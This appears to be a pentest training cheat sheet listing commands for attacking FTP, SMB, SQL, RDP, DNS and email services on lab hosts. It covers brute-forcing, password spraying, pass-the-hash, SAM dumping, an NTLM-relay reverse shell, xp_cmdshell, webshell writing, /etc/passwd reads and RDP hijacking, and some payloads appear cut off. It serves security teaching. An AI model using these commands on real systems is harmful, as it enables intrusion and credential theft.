# Attacking Common Services ## Attacking FTP | **Command** | **Description** | | ------------------------------------------------------------------------ | ---------------------------------------------------- | | `ftp 192.168.2.142` | Connecting to the FTP server using the `ftp` client. | | `nc -v 192.168.2.142 21` | Connecting to the FTP server using `netcat`. | | `hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142` | Brute-forcing the FTP service. | *** ## Attacking SMB | **Command** | **Description** | | --------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------- | | `smbclient -N -L //10.129.14.128` | Null-session testing against the SMB service. | | `smbmap -H 10.129.14.128` | Network share enumeration using `smbmap`. | | `smbmap -H 10.129.14.128 -r notes` | Recursive network share enumeration using `smbmap`. | | `smbmap -H 10.129.14.128 --download "notes\note.txt"` | Download a specific file from the shared folder. | | `smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"` | Upload a specific file to the shared folder. | | `rpcclient -U'%' 10.10.110.17` | Null-session with the `rpcclient`. | | `./enum4linux-ng.py 10.10.11.45 -A -C` | Automated enumeratition of the SMB service using `enum4linux-ng`. | | `crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'` | Password spraying against different users from a list. | | `impacket-psexec administrator:'Password123!'@10.10.110.17` | Connect to the SMB service using the `impacket-psexec`. | | `crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec` | Execute a command over the SMB service using `crackmapexec`. | | `crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users` | Enumerating Logged-on users. | | `crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam` | Extract hashes from the SAM database. | | `crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE` | Use the Pass-The-Hash technique to authenticate on the target host. | | `impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146` | Dump the SAM database using `impacket-ntlmrelayx`. | | `impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e ` | Execute a PowerShell based reverse shell using `impacket-ntlmrelayx`. | *** ## Attacking SQL Databases | **Command** | **Description** | | -------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `mysql -u julio -pPassword123 -h 10.129.20.13` | Connecting to the MySQL server. | | `sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30` | Connecting to the MSSQL server. | | `sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h` | Connecting to the MSSQL server from Linux. | | `sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h` | Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server. | | `mysql> SHOW DATABASES;` | Show all available databases in MySQL. | | `mysql> USE htbusers;` | Select a specific database in MySQL. | | `mysql> SHOW TABLES;` | Show all available tables in the selected database in MySQL. | | `mysql> SELECT * FROM users;` | Select all available entries from the "users" table in MySQL. | | `sqlcmd> SELECT name FROM master.dbo.sysdatabases` | Show all available databases in MSSQL. | | `sqlcmd> USE htbusers` | Select a specific database in MSSQL. | | `sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES` | Show all available tables in the selected database in MSSQL. | | `sqlcmd> SELECT * FROM users` | Select all available entries from the "users" table in MSSQL. | | `sqlcmd> EXECUTE sp_configure 'show advanced options', 1` | To allow advanced options to be changed. | | `sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1` | To enable the xp\_cmdshell. | | `sqlcmd> RECONFIGURE` | To be used after each sp\_configure command to apply the changes. | | `sqlcmd> xp_cmdshell 'whoami'` | Execute a system command from MSSQL server. | | `mysql> SELECT "" INTO OUTFILE '/var/www/html/webshell.php'` | Create a file using MySQL. | | `mysql> show variables like "secure_file_priv";` | Check if the the secure file privileges are empty to read locally stored files on the system. | | `sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents` | Read local files in MSSQL. | | `mysql> select LOAD_FILE("/etc/passwd");` | Read local files in MySQL. | | `sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'` | Hash stealing using the `xp_dirtree` command in MSSQL. | | `sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'` | Hash stealing using the `xp_subdirs` command in MSSQL. | | `sqlcmd> SELECT srvname, isremote FROM sysservers` | Identify linked servers in MSSQL. | | `sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]` | Identify the user and its privileges used for the remote connection in MSSQL. | *** ## Attacking RDP | **Command** | **Description** | | ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------- | | `crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'` | Password spraying against the RDP service. | | `hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp` | Brute-forcing the RDP service. | | `rdesktop -u admin -p password123 192.168.2.143` | Connect to the RDP service using `rdesktop` in Linux. | | `tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}` | Impersonate a user without its password. | | `net start sessionhijack` | Execute the RDP session hijack. | | `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f` | Enable "Restricted Admin Mode" on the target Windows host. | | `xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA` | Use the Pass-The-Hash technique to login on the target host without a password. | *** ## Attacking DNS | **Command** | **Description** | | --------------------------------------------------- | --------------------------------------------------------------------- | | `dig AXFR @ns1.inlanefreight.htb inlanefreight.htb` | Perform an AXFR zone transfer attempt against a specific name server. | | `subfinder -d inlanefreight.com -v` | Brute-forcing subdomains. | | `host support.inlanefreight.com` | DNS lookup for the specified subdomain. | *** ## Attacking Email Services | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------- | | `host -t MX microsoft.com` | DNS lookup for mail servers for the specified domain. | | `dig mx inlanefreight.com \| grep "MX" \| grep -v ";"` | DNS lookup for mail servers for the specified domain. | | `host -t A mail1.inlanefreight.htb.` | DNS lookup of the IPv4 address for the specified subdomain. | | `telnet 10.10.110.20 25` | Connect to the SMTP server. | | `smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7` | SMTP user enumeration using the RCPT command against the specified host. | | `python3 o365spray.py --validate --domain msplaintext.xyz` | Verify the usage of Office365 for the specified domain. | | `python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz` | Enumerate existing users using Office365 on the specified domain. | | `python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz` | Password spraying against a list of users that use Office365 for the specified domain. | | `hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3` | Brute-forcing the POP3 service. | | `swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213` | Testing the SMTP service for the open-relay vulnerability. |